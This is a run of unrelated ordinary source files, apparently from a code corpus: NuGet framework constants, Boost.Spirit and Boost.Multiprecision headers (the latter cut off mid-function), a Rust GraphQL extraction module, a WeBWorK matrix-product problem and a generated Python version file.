deprecated\n public const string NetMicro = \".NETMicroFramework\";\n public const string Portable = \".NETPortable\";\n public const string WindowsPhone = \"WindowsPhone\";\n public const string Windows = \"Windows\";\n public const string WindowsPhoneApp = \"WindowsPhoneApp\";\n public const string Dnx = \"DNX\";\n public const string DnxCore = \"DNXCore\";\n public const string AspNet = \"ASP.NET\";\n public const string AspNetCore = \"ASP.NETCore\";\n public const string Silverlight = \"Silverlight\";\n public const string Native = \"native\";\n public const string MonoAndroid = \"MonoAndroid\";\n public const string MonoTouch = \"MonoTouch\";\n public const string MonoMac = \"MonoMac\";\n public const string XamarinIOs = \"Xamarin.iOS\";\n public const string XamarinMac = \"Xamarin.Mac\";\n public const string XamarinPlayStation3 = \"Xamarin.PlayStation3\";\n public const string XamarinPlayStation4 = \"Xamarin.PlayStation4\";\n public const string XamarinPlayStationVita = \"Xamarin.PlayStationVita\";\n public const string XamarinWatchOS = \"Xamarin.WatchOS\";\n public const string XamarinTVOS = \"Xamarin.TVOS\";\n public const string XamarinXbox360 = \"Xamarin.Xbox360\";\n public const string XamarinXboxOne = \"Xamarin.XboxOne\";\n public const string UAP = \"UAP\";\n public const string Tizen = \"Tizen\";\n }\n\n /// \n /// Interned frameworks that are commonly used in NuGet\n /// \n public static class CommonFrameworks\n {\n public static readonly NuGetFramework Net11 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(1, 1, 0, 0));\n public static readonly NuGetFramework Net2 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(2, 0, 0, 0));\n public static readonly NuGetFramework Net35 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(3, 5, 0, 0));\n public static readonly NuGetFramework Net4 = new 
NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 0, 0, 0));\n public static readonly NuGetFramework Net403 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 0, 3, 0));\n public static readonly NuGetFramework Net45 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 5, 0, 0));\n public static readonly NuGetFramework Net451 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 5, 1, 0));\n public static readonly NuGetFramework Net452 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 5, 2, 0));\n public static readonly NuGetFramework Net46 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 6, 0, 0));\n public static readonly NuGetFramework Net461 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 6, 1, 0));\n public static readonly NuGetFramework Net462 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 6, 2, 0));\n public static readonly NuGetFramework Net463 = new NuGetFramework(FrameworkIdentifiers.Net, new Version(4, 6, 3, 0));\n\n public static readonly NuGetFramework NetCore45 = new NuGetFramework(FrameworkIdentifiers.NetCore, new Version(4, 5, 0, 0));\n public static readonly NuGetFramework NetCore451 = new NuGetFramework(FrameworkIdentifiers.NetCore, new Version(4, 5, 1, 0));\n public static readonly NuGetFramework NetCore50 = new NuGetFramework(FrameworkIdentifiers.NetCore, new Version(5, 0, 0, 0));\n\n public static readonly NuGetFramework Win8 = new NuGetFramework(FrameworkIdentifiers.Windows, new Version(8, 0, 0, 0));\n public static readonly NuGetFramework Win81 = new NuGetFramework(FrameworkIdentifiers.Windows, new Version(8, 1, 0, 0));\n public static readonly NuGetFramework Win10 = new NuGetFramework(FrameworkIdentifiers.Windows, new Version(10, 0, 0, 0));\n\n public static readonly NuGetFramework SL4 = new NuGetFramework(FrameworkIdentifiers.Silverlight, new Version(4, 0, 0, 0));\n public static readonly NuGetFramework SL5 = new NuGetFramework(FrameworkIdentifiers.Silverlight, new Version(5, 0, 0, 0));\n\n public static readonly NuGetFramework WP7 = new NuGetFramework(FrameworkIdentifiers.WindowsPhone, new Version(7, 0, 0, 0));\n public static readonly NuGetFramework WP75 = new NuGetFramework(FrameworkIdentifiers.WindowsPhone, new Version(7, 5, 0, 0));\n public static readonly NuGetFramework WP8 = new NuGetFramework(FrameworkIdentifiers.WindowsPhone, new Version(8, 0, 0, 0));\n public static readonly NuGetFramework WP81 = new NuGetFramework(FrameworkIdentifiers.WindowsPhone, new Version(8, 1, 0, 0));\n public static readonly NuGetFramework WPA81 = new NuGetFramework(FrameworkIdentifiers.WindowsPhoneApp, new Version(8, 1, 0, 0));\n\n public static readonly NuGetFramework Tizen3 = new NuGetFramework(FrameworkIdentifiers.Tizen, new Version(3, 0, 0, 0));\n public static readonly NuGetFramework Tizen4 = new NuGetFramework(FrameworkIdentifiers.Tizen, new Version(4, 0, 0, 0));\n public static readonly NuGetFramework Tizen6 = new NuGetFramework(FrameworkIdentifiers.Tizen, new Version(6, 0, 0, 0));\n\n public static readonly NuGetFramework AspNet = new NuGetFramework(FrameworkIdentifiers.AspNet, EmptyVersion);\n public static readonly NuGetFramework AspNetCore = new NuGetFramework(FrameworkIdentifiers.AspNetCore, EmptyVersion);\n public static readonly NuGetFramework AspNet50 = new NuGetFramework(FrameworkIdentifiers.AspNet, Version5);\n public static readonly NuGetFramework AspNetCore50 = new NuGetFramework(FrameworkIdentifiers.AspNetCore, Version5);\n\n public static readonly NuGetFramework Dnx = new 
NuGetFramework(FrameworkIdentifiers.Dnx, EmptyVersion);\n public static readonly NuGetFramework Dnx45 = new NuGetFramework(FrameworkIdentifiers.Dnx, new Version(4, 5, 0, 0));\n public static readonly NuGetFramework Dnx451 = new NuGetFramework(FrameworkIdentifiers.Dnx, new Version(4, 5, 1, 0));\n public static readonly NuGetFramework Dnx452 = new NuGetFramework(FrameworkIdentifiers.Dnx, new Version(4, 5, 2, 0));\n public static readonly NuGetFramework DnxCore = new NuGetFramework(FrameworkIdentifiers.DnxCore, EmptyVersion);\n public static readonly NuGetFramework DnxCore50 = new NuGetFramework(FrameworkIdentifiers.DnxCore, Version5);\n\n public static readonly NuGetFramework DotNet\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, EmptyVersion);\n public static readonly NuGetFramework DotNet50\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, Version5);\n public static readonly NuGetFramework DotNet51\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, new Version(5, 1, 0, 0));\n public static readonly NuGetFramework DotNet52\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, new Version(5, 2, 0, 0));\n public static readonly NuGetFramework DotNet53\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, new Version(5, 3, 0, 0));\n public static readonly NuGetFramework DotNet54\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, new Version(5, 4, 0, 0));\n public static readonly NuGetFramework DotNet55\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, new Version(5, 5, 0, 0));\n public static readonly NuGetFramework DotNet56\n = new NuGetFramework(FrameworkIdentifiers.NetPlatform, new Version(5, 6, 0, 0));\n\n public static readonly NuGetFramework NetStandard\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, EmptyVersion);\n public static readonly NuGetFramework NetStandard10\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 0, 0, 0));\n public static readonly NuGetFramework NetStandard11\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 1, 0, 0));\n public static readonly NuGetFramework NetStandard12\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 2, 0, 0));\n public static readonly NuGetFramework NetStandard13\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 3, 0, 0));\n public static readonly NuGetFramework NetStandard14\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 4, 0, 0));\n public static readonly NuGetFramework NetStandard15\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 5, 0, 0));\n public static readonly NuGetFramework NetStandard16\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 6, 0, 0));\n public static readonly NuGetFramework NetStandard17\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(1, 7, 0, 0));\n public static readonly NuGetFramework NetStandard20\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(2, 0, 0, 0));\n public static readonly NuGetFramework NetStandard21\n = new NuGetFramework(FrameworkIdentifiers.NetStandard, new Version(2, 1, 0, 0));\n\n public static readonly NuGetFramework NetStandardApp15\n = new NuGetFramework(FrameworkIdentifiers.NetStandardApp, new Version(1, 5, 0, 0));\n\n public static readonly NuGetFramework UAP10\n = new NuGetFramework(FrameworkIdentifiers.UAP, Version10);\n\n public static readonly NuGetFramework NetCoreApp10\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(1, 0, 0, 
0));\n public static readonly NuGetFramework NetCoreApp11\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(1, 1, 0, 0));\n public static readonly NuGetFramework NetCoreApp20\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(2, 0, 0, 0));\n public static readonly NuGetFramework NetCoreApp21\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(2, 1, 0, 0));\n public static readonly NuGetFramework NetCoreApp22\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(2, 2, 0, 0));\n public static readonly NuGetFramework NetCoreApp30\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(3, 0, 0, 0));\n public static readonly NuGetFramework NetCoreApp31\n = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, new Version(3, 1, 0, 0));\n\n // .NET 5.0 and later has NetCoreApp identifier\n public static readonly NuGetFramework Net50 = new NuGetFramework(FrameworkIdentifiers.NetCoreApp, Version5);\n }\n }\n}\n"} {"text": "/*=============================================================================\n Copyright (c) 2001-2011 Joel de Guzman\n Copyright (c) 2001-2011 Hartmut Kaiser\n Copyright (c) 2011 Thomas Heller\n\n Distributed under the Boost Software License, Version 1.0. (See accompanying\n file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)\n==============================================================================*/\n#if !defined(BOOST_SPIRIT_CONTEXT_OCTOBER_31_2008_0654PM)\n#define BOOST_SPIRIT_CONTEXT_OCTOBER_31_2008_0654PM\n\n#if defined(_MSC_VER)\n#pragma once\n#endif\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n///////////////////////////////////////////////////////////////////////////////\n#ifndef BOOST_SPIRIT_NO_PREDEFINED_TERMINALS\n\n#define SPIRIT_DECLARE_ATTRIBUTE(z, n, data) \\\n typedef phoenix::actor > \\\n BOOST_PP_CAT(BOOST_PP_CAT(_r, n), _type); \\\n phoenix::actor > const \\\n BOOST_PP_CAT(_r, n) = BOOST_PP_CAT(BOOST_PP_CAT(_r, n), _type)();\n /***/\n#define SPIRIT_USING_ATTRIBUTE(z, n, data) \\\n using spirit::BOOST_PP_CAT(BOOST_PP_CAT(_r, n), _type); \\\n using spirit::BOOST_PP_CAT(_r, n); \\\n /***/\n\n#else\n\n#define SPIRIT_DECLARE_ATTRIBUTE(z, n, data) \\\n typedef phoenix::actor > \\\n BOOST_PP_CAT(BOOST_PP_CAT(_r, n), _type); \\\n /***/\n#define SPIRIT_USING_ATTRIBUTE(z, n, data) \\\n using spirit::BOOST_PP_CAT(BOOST_PP_CAT(_r, n), _type); \\\n /***/\n\n#endif\n\nnamespace boost { namespace spirit\n{\n template \n struct attribute;\n\n template \n struct local_variable;\n}}\n\nBOOST_PHOENIX_DEFINE_CUSTOM_TERMINAL(\n template \n , boost::spirit::attribute\n , mpl::false_ // is not nullary\n , v2_eval(\n proto::make<\n boost::spirit::attribute()\n >\n , proto::call<\n functional::env(proto::_state)\n >\n )\n)\n\nBOOST_PHOENIX_DEFINE_CUSTOM_TERMINAL(\n template \n , boost::spirit::local_variable\n , mpl::false_ // is not nullary\n , v2_eval(\n proto::make<\n boost::spirit::local_variable()\n >\n , proto::call<\n functional::env(proto::_state)\n >\n )\n)\n\nnamespace boost { namespace spirit\n{\n template \n struct context\n {\n typedef Attributes attributes_type;\n typedef Locals locals_type;\n\n context(typename Attributes::car_type attribute)\n : attributes(attribute, fusion::nil()), locals() {}\n\n template \n context(\n typename Attributes::car_type attribute\n , Args const& args\n , Context& caller_context\n ) : attributes(\n attribute\n , fusion::as_list(\n 
fusion::transform(\n args\n , detail::expand_arg(caller_context)\n )\n )\n )\n , locals() {}\n\n context(Attributes const& attributes)\n : attributes(attributes), locals() {}\n\n Attributes attributes; // The attributes\n Locals locals; // Local variables\n };\n\n template \n struct attributes_of\n {\n typedef typename Context::attributes_type type;\n };\n\n template \n struct attributes_of\n {\n typedef typename Context::attributes_type const type;\n };\n\n template \n struct attributes_of\n : attributes_of\n {};\n\n template \n struct locals_of\n {\n typedef typename Context::locals_type type;\n };\n\n template \n struct locals_of\n {\n typedef typename Context::locals_type const type;\n };\n\n template \n struct locals_of\n {\n typedef typename Context::locals_type type;\n };\n\n template \n struct attribute\n {\n typedef mpl::true_ no_nullary;\n\n template \n struct result\n {\n typedef typename\n attributes_of::type\n >::type\n attributes_type;\n\n typedef typename\n fusion::result_of::size::type\n attributes_size;\n\n // report invalid argument not found (N is out of bounds)\n BOOST_SPIRIT_ASSERT_MSG(\n (N < attributes_size::value),\n index_is_out_of_bounds, ());\n\n typedef typename\n fusion::result_of::at_c::type\n type;\n };\n\n template \n typename result::type\n eval(Env const& env) const\n {\n return fusion::at_c((fusion::at_c<1>(env.args())).attributes);\n }\n };\n\n template \n struct local_variable\n {\n typedef mpl::true_ no_nullary;\n\n template \n struct result\n {\n typedef typename\n locals_of::type\n >::type\n locals_type;\n\n typedef typename\n fusion::result_of::size::type\n locals_size;\n\n // report invalid argument not found (N is out of bounds)\n BOOST_SPIRIT_ASSERT_MSG(\n (N < locals_size::value),\n index_is_out_of_bounds, ());\n\n typedef typename\n fusion::result_of::at_c::type\n type;\n };\n\n template \n typename result::type\n eval(Env const& env) const\n {\n return get_arg((fusion::at_c<1>(env.args())).locals);\n }\n };\n \n typedef phoenix::actor > _val_type;\n typedef phoenix::actor > _r0_type;\n typedef phoenix::actor > _r1_type;\n typedef phoenix::actor > _r2_type;\n\n#ifndef BOOST_SPIRIT_NO_PREDEFINED_TERMINALS\n // _val refers to the 'return' value of a rule (same as _r0)\n // _r1, _r2, ... refer to the rule arguments\n _val_type const _val = _val_type();\n _r0_type const _r0 = _r0_type();\n _r1_type const _r1 = _r1_type();\n _r2_type const _r2 = _r2_type();\n#endif\n\n // Bring in the rest of the attributes (_r4 .. _rN+1), using PP\n BOOST_PP_REPEAT_FROM_TO(\n 3, SPIRIT_ATTRIBUTES_LIMIT, SPIRIT_DECLARE_ATTRIBUTE, _)\n\n typedef phoenix::actor > _a_type;\n typedef phoenix::actor > _b_type;\n typedef phoenix::actor > _c_type;\n typedef phoenix::actor > _d_type;\n typedef phoenix::actor > _e_type;\n typedef phoenix::actor > _f_type;\n typedef phoenix::actor > _g_type;\n typedef phoenix::actor > _h_type;\n typedef phoenix::actor > _i_type;\n typedef phoenix::actor > _j_type;\n\n#ifndef BOOST_SPIRIT_NO_PREDEFINED_TERMINALS\n // _a, _b, ... 
refer to the local variables of a rule\n _a_type const _a = _a_type();\n _b_type const _b = _b_type();\n _c_type const _c = _c_type();\n _d_type const _d = _d_type();\n _e_type const _e = _e_type();\n _f_type const _f = _f_type();\n _g_type const _g = _g_type();\n _h_type const _h = _h_type();\n _i_type const _i = _i_type();\n _j_type const _j = _j_type();\n#endif\n\n // You can bring these in with the using directive\n // without worrying about bringing in too much.\n namespace labels\n {\n BOOST_PP_REPEAT(SPIRIT_ARGUMENTS_LIMIT, SPIRIT_USING_ARGUMENT, _)\n BOOST_PP_REPEAT(SPIRIT_ATTRIBUTES_LIMIT, SPIRIT_USING_ATTRIBUTE, _)\n\n#ifndef BOOST_SPIRIT_NO_PREDEFINED_TERMINALS\n using spirit::_val;\n using spirit::_a;\n using spirit::_b;\n using spirit::_c;\n using spirit::_d;\n using spirit::_e;\n using spirit::_f;\n using spirit::_g;\n using spirit::_h;\n using spirit::_i;\n using spirit::_j;\n#endif\n }\n}}\n\n#endif\n"} {"text": "/*\n * Copyright (c) Facebook, Inc. and its affiliates.\n *\n * This source code is licensed under the MIT license found in the\n * LICENSE file in the root directory of this source tree.\n */\n\nuse super::{read_to_string, WatchmanFile};\nuse crate::errors::{Error, Result};\nuse common::SourceLocationKey;\nuse graphql_syntax::GraphQLSource;\nuse std::{fs, path::Path};\nuse watchman_client::prelude::*;\n\n/// Reads and extracts `graphql` tagged literals from a file.\npub fn extract_graphql_strings_from_file(\n resolved_root: &ResolvedRoot,\n file: &WatchmanFile,\n) -> Result> {\n let contents = read_to_string(resolved_root, file)?;\n extract_graphql_strings_from_string(&contents)\n}\n\npub fn source_for_location(\n root_dir: &Path,\n source_location: SourceLocationKey,\n) -> Option {\n match source_location {\n SourceLocationKey::Embedded { path, index } => {\n let absolute_path = root_dir.join(path.lookup());\n let contents = fs::read_to_string(&absolute_path).ok()?;\n let file_sources = extract_graphql_strings_from_string(&contents).ok()?;\n file_sources.into_iter().nth(index)\n }\n SourceLocationKey::Standalone { path } => {\n let absolute_path = root_dir.join(path.lookup());\n Some(GraphQLSource {\n text: fs::read_to_string(&absolute_path).ok()?,\n line_index: 0,\n column_index: 0,\n })\n }\n SourceLocationKey::Generated => None,\n }\n}\n\n/// Reads and extracts `graphql` tagged literals from a string.\nfn extract_graphql_strings_from_string(contents: &str) -> Result> {\n extract_graphql::parse_chunks(&contents).map_err(|err| Error::Syntax { error: err })\n}\n"} {"text": "## DESCRIPTION\n## Linear Algebra\n## ENDDESCRIPTION\n\n## Tagged by tda2d\n\n## DBsubject(Linear algebra)\n## DBchapter(Matrices)\n## DBsection(Matrix algebra)\n## Date(July 2013)\n## Institution(TCNJ and Hope College)\n## Author(Paul Pearson)\n## MLT(matrix_mult)\n## Level(2)\n## MO(1)\n## TitleText1('Linear Algebra with Applications')\n## AuthorText1('Jeffrey Holt')\n## EditionText1('1')\n## Section1('3.2')\n## Problem1('')\n## KEYWORDS('matrix' 'product')\n\nDOCUMENT();\n\nloadMacros(\n \"PGstandard.pl\",\n \"MathObjects.pl\",\n \"PGcourse.pl\"\n);\n\nTEXT(beginproblem());\n$showPartialCorrectAnswers = 1;\n\nContext('Matrix');\n\n$A = Matrix([\n[non_zero_random(-9,9,1),non_zero_random(-9,9,1)],\n[non_zero_random(-9,9,1),non_zero_random(-9,9,1)],\n]);\n\n$B = Matrix([\n[non_zero_random(-9,9,1),non_zero_random(-9,9,1)],\n[non_zero_random(-9,9,1),non_zero_random(-9,9,1)],\n]);\n\n$B1 = $B->column(1);\n$B2 = $B->column(2);\n\n$ans[1] = $A * $B1;\n$ans[2] = $A * $B2;\n$ans[3] = $A * 
$B;\n\nContext()->texStrings;\nBEGIN_TEXT\nCompute the following products. \n$BR\n$BR\n\\( $A $B1 = \\) \\{ $ans[1]->ans_array(15) \\}\n$BR\n$BR\n\\( $A $B2 = \\) \\{ $ans[2]->ans_array(15) \\}\n$BR\n$BR\n\\( $A $B = \\) \\{ $ans[3]->ans_array(15) \\}\nEND_TEXT\nContext()->normalStrings;\n\nforeach my $i (1..3) {\nANS($ans[$i]->cmp);\n}\n;\nENDDOCUMENT();\n"} {"text": "#!/usr/bin/env python\n\"\"\"This file is automatically generated by generate_version_info\nIt uses the current working tree to determine the revision.\nSo don't edit it. :)\n\"\"\"\n\nversion_info = {'branch_nick': 'python-daemon.devel',\n 'build_date': '2009-05-22 19:50:06 +1000',\n 'clean': None,\n 'date': '2009-05-22 19:47:30 +1000',\n 'revision_id': 'ben+python@benfinney.id.au-20090522094730-p4vsa0reh7ktt4e1',\n 'revno': 145}\n\nrevisions = {}\n\nfile_revisions = {}\n\n\n\nif __name__ == '__main__':\n print('revision: %(revno)d' % version_info)\n print('nick: %(branch_nick)s' % version_info)\n print('revision id: %(revision_id)s' % version_info)\n"} {"text": "//////////////////3/////////////////////////////////////////////\r\n// Copyright 2012 John Maddock. Distributed under the Boost\r\n// Software License, Version 1.0. (See accompanying file\r\n// LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_\r\n\r\n#ifndef BOOST_MP_CPP_INT_HPP\r\n#define BOOST_MP_CPP_INT_HPP\r\n\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#ifdef BOOST_MP_USER_DEFINED_LITERALS\r\n#include \r\n#endif\r\n\r\nnamespace boost{\r\nnamespace multiprecision{\r\nnamespace backends{\r\n\r\n using boost::enable_if;\r\n\r\n\r\n#ifdef BOOST_MSVC\r\n#pragma warning(push)\r\n#pragma warning(disable:4307) // integral constant overflow (oveflow is in a branch not taken when it would overflow)\r\n#pragma warning(disable:4127) // conditional expression is constant\r\n#pragma warning(disable:4702) // Unreachable code (reachability depends on template params)\r\n#endif\r\n\r\ntemplate >::type >\r\nstruct cpp_int_backend;\r\n\r\n} // namespace backends\r\n\r\nnamespace detail {\r\n\r\n template \r\n struct is_byte_container > : public boost::false_type {};\r\n\r\n} // namespace detail\r\n\r\nnamespace backends{\r\n\r\ntemplate \r\nstruct cpp_int_base;\r\n//\r\n// Traits class determines the maximum and minimum precision values:\r\n//\r\ntemplate struct max_precision;\r\n\r\ntemplate \r\nstruct max_precision >\r\n{\r\n static const unsigned value = is_void::value ?\r\n static_unsigned_max::value\r\n : (((MaxBits >= MinBits) && MaxBits) ? MaxBits : UINT_MAX);\r\n};\r\n\r\ntemplate struct min_precision;\r\n\r\ntemplate \r\nstruct min_precision >\r\n{\r\n static const unsigned value = (is_void::value ? static_unsigned_max::value : MinBits);\r\n};\r\n//\r\n// Traits class determines whether the number of bits precision requested could fit in a native type,\r\n// we call this a \"trivial\" cpp_int:\r\n//\r\ntemplate \r\nstruct is_trivial_cpp_int\r\n{\r\n static const bool value = false;\r\n};\r\n\r\ntemplate \r\nstruct is_trivial_cpp_int >\r\n{\r\n typedef cpp_int_backend self;\r\n static const bool value = is_void::value && (max_precision::value <= (sizeof(double_limb_type) * CHAR_BIT) - (SignType == signed_packed ? 
1 : 0));\r\n};\r\n\r\ntemplate \r\nstruct is_trivial_cpp_int >\r\n{\r\n static const bool value = true;\r\n};\r\n\r\n} // namespace backends\r\n//\r\n// Traits class to determine whether a cpp_int_backend is signed or not:\r\n//\r\ntemplate \r\nstruct is_unsigned_number >\r\n : public mpl::bool_<(SignType == unsigned_magnitude) || (SignType == unsigned_packed)>{};\r\n\r\nnamespace backends{\r\n//\r\n// Traits class determines whether T should be implicitly convertible to U, or\r\n// whether the constructor should be made explicit. The latter happens if we\r\n// are losing the sign, or have fewer digits precision in the target type:\r\n//\r\ntemplate \r\nstruct is_implicit_cpp_int_conversion;\r\n\r\ntemplate \r\nstruct is_implicit_cpp_int_conversion, cpp_int_backend >\r\n{\r\n typedef cpp_int_backend t1;\r\n typedef cpp_int_backend t2;\r\n static const bool value =\r\n (is_signed_number::value || !is_signed_number::value)\r\n && (max_precision::value <= max_precision::value);\r\n};\r\n\r\n//\r\n// Traits class to determine whether operations on a cpp_int may throw:\r\n//\r\ntemplate \r\nstruct is_non_throwing_cpp_int : public mpl::false_{};\r\ntemplate \r\nstruct is_non_throwing_cpp_int > : public mpl::true_ {};\r\n\r\n//\r\n// Traits class, determines whether the cpp_int is fixed precision or not:\r\n//\r\ntemplate \r\nstruct is_fixed_precision;\r\ntemplate \r\nstruct is_fixed_precision >\r\n : public mpl::bool_ >::value != UINT_MAX> {};\r\n\r\nnamespace detail{\r\n\r\ninline void verify_new_size(unsigned new_size, unsigned min_size, const mpl::int_&)\r\n{\r\n if(new_size < min_size)\r\n BOOST_THROW_EXCEPTION(std::overflow_error(\"Unable to allocate sufficient storage for the value of the result: value overflows the maximum allowable magnitude.\"));\r\n}\r\ninline void verify_new_size(unsigned /*new_size*/, unsigned /*min_size*/, const mpl::int_&){}\r\n\r\ntemplate \r\ninline void verify_limb_mask(bool b, U limb, U mask, const mpl::int_&)\r\n{\r\n // When we mask out \"limb\" with \"mask\", do we loose bits? If so it's an overflow error:\r\n if(b && (limb & ~mask))\r\n BOOST_THROW_EXCEPTION(std::overflow_error(\"Overflow in cpp_int arithmetic: there is insufficient precision in the target type to hold all of the bits of the result.\"));\r\n}\r\ntemplate \r\ninline void verify_limb_mask(bool /*b*/, U /*limb*/, U /*mask*/, const mpl::int_&){}\r\n\r\n}\r\n\r\n//\r\n// Now define the various data layouts that are possible as partial specializations of the base class,\r\n// starting with the default arbitrary precision signed integer type:\r\n//\r\ntemplate \r\nstruct cpp_int_base : private Allocator::template rebind::other\r\n{\r\n typedef typename Allocator::template rebind::other allocator_type;\r\n typedef typename allocator_type::pointer limb_pointer;\r\n typedef typename allocator_type::const_pointer const_limb_pointer;\r\n typedef mpl::int_ checked_type;\r\n\r\n //\r\n // Interface invariants:\r\n //\r\n BOOST_STATIC_ASSERT(!is_void::value);\r\n\r\nprivate:\r\n struct limb_data\r\n {\r\n unsigned capacity;\r\n limb_pointer data;\r\n };\r\n\r\npublic:\r\n BOOST_STATIC_CONSTANT(unsigned, limb_bits = sizeof(limb_type) * CHAR_BIT);\r\n BOOST_STATIC_CONSTANT(limb_type, max_limb_value = ~static_cast(0u));\r\n BOOST_STATIC_CONSTANT(limb_type, sign_bit_mask = static_cast(1u) << (limb_bits - 1));\r\n BOOST_STATIC_CONSTANT(unsigned, internal_limb_count =\r\n MinBits\r\n ? (MinBits / limb_bits + ((MinBits % limb_bits) ? 
1 : 0))\r\n : (sizeof(limb_data) / sizeof(limb_type)));\r\n BOOST_STATIC_CONSTANT(bool, variable = true);\r\n\r\nprivate:\r\n union data_type\r\n {\r\n limb_data ld;\r\n limb_type la[internal_limb_count];\r\n limb_type first;\r\n double_limb_type double_first;\r\n\r\n BOOST_CONSTEXPR data_type() : first(0) {}\r\n BOOST_CONSTEXPR data_type(limb_type i) : first(i) {}\r\n BOOST_CONSTEXPR data_type(signed_limb_type i) : first(i < 0 ? static_cast(boost::multiprecision::detail::unsigned_abs(i)) : i) {}\r\n#ifdef BOOST_LITTLE_ENDIAN\r\n BOOST_CONSTEXPR data_type(double_limb_type i) : double_first(i) {}\r\n BOOST_CONSTEXPR data_type(signed_double_limb_type i) : double_first(i < 0 ? static_cast(boost::multiprecision::detail::unsigned_abs(i)) : i) {}\r\n#endif\r\n };\r\n\r\n data_type m_data;\r\n unsigned m_limbs;\r\n bool m_sign, m_internal;\r\n\r\npublic:\r\n //\r\n // Direct construction:\r\n //\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(limb_type i)BOOST_NOEXCEPT\r\n : m_data(i), m_limbs(1), m_sign(false), m_internal(true) { }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(signed_limb_type i)BOOST_NOEXCEPT\r\n : m_data(i), m_limbs(1), m_sign(i < 0), m_internal(true) { }\r\n#if defined(BOOST_LITTLE_ENDIAN) && !defined(BOOST_MP_TEST_NO_LE)\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(double_limb_type i)BOOST_NOEXCEPT\r\n : m_data(i), m_limbs(i > max_limb_value ? 2 : 1), m_sign(false), m_internal(true) { }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(signed_double_limb_type i)BOOST_NOEXCEPT\r\n : m_data(i), m_limbs(i < 0 ? (static_cast(boost::multiprecision::detail::unsigned_abs(i)) > static_cast(max_limb_value) ? 2 : 1) : (i > max_limb_value ? 2 : 1)),\r\n m_sign(i < 0), m_internal(true) { }\r\n#endif\r\n //\r\n // Helper functions for getting at our internal data, and manipulating storage:\r\n //\r\n BOOST_MP_FORCEINLINE allocator_type& allocator() BOOST_NOEXCEPT { return *this; }\r\n BOOST_MP_FORCEINLINE const allocator_type& allocator()const BOOST_NOEXCEPT { return *this; }\r\n BOOST_MP_FORCEINLINE unsigned size()const BOOST_NOEXCEPT { return m_limbs; }\r\n BOOST_MP_FORCEINLINE limb_pointer limbs() BOOST_NOEXCEPT { return m_internal ? m_data.la : m_data.ld.data; }\r\n BOOST_MP_FORCEINLINE const_limb_pointer limbs()const BOOST_NOEXCEPT { return m_internal ? m_data.la : m_data.ld.data; }\r\n BOOST_MP_FORCEINLINE unsigned capacity()const BOOST_NOEXCEPT { return m_internal ? internal_limb_count : m_data.ld.capacity; }\r\n BOOST_MP_FORCEINLINE bool sign()const BOOST_NOEXCEPT { return m_sign; }\r\n void sign(bool b) BOOST_NOEXCEPT\r\n {\r\n m_sign = b;\r\n // Check for zero value:\r\n if(m_sign && (m_limbs == 1))\r\n {\r\n if(limbs()[0] == 0)\r\n m_sign = false;\r\n }\r\n }\r\n void resize(unsigned new_size, unsigned min_size)\r\n {\r\n static const unsigned max_limbs = MaxBits / (CHAR_BIT * sizeof(limb_type)) + ((MaxBits % (CHAR_BIT * sizeof(limb_type))) ? 
